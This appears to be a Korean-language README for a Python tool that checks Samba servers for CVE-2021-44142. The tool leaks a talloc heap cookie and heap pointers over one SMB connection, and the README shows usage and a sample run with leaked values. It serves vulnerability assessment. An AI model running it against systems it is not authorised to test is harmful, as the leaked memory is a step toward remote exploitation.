
Python 도구로, 단일 SMB 연결을 통해 힙 쿠키와 포인터를 유출하여 Samba 서버의 CVE-2021-44142 취약점을 점검하고, 악용 가능성을 입증합니다.
Samba 서버가 CVE-2021-44142에 취약한지 확인하는 도구
CVE-2021-44142는 Pwn2Own Austin 2021에서 Western Digital PR4100을 대상으로 사용된 Samba의 vfs_fruit 모듈에서 발생하는 힙(heap) out-of-bounds 읽기 및 쓰기 취약점입니다. 이 취약점은 STAR Labs의 Nguyễn Hoàng Thạch와 Billy Jheng Bing-Jhong이 처음 발견했습니다. DEVCORE의 Orange Tsai도 이 취약점을 보고했습니다. 본 작업은 https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142에 있는 0xsha의 블로그 게시물을 기반으로 합니다.
이 도구는 talloc 힙 쿠키와 연결 리스트 포인터를 덤프하여 CVE-2021-44142에 대한 취약성을 입증합니다. 유사한 기법으로 이 데이터를 쓸 수도 있습니다.
본 작업은 0xsha의 작업을 다음과 같이 확장합니다:
python check_vulnerable.py
usage: check_vulnerable.py [-h] [--password PASSWORD] server port share user
check_vulnerable.py: error: the following arguments are required: server, port, share, user
python check_vulnerable.py 192.168.1.183 445 TimeMachineBackup Guest
{
"vulnerable": true,
"heap_cookie_leak": "0xfc571370",
"heap_pointer_leak": "0x55e4e717b1b0",
"fail_reason": ""
}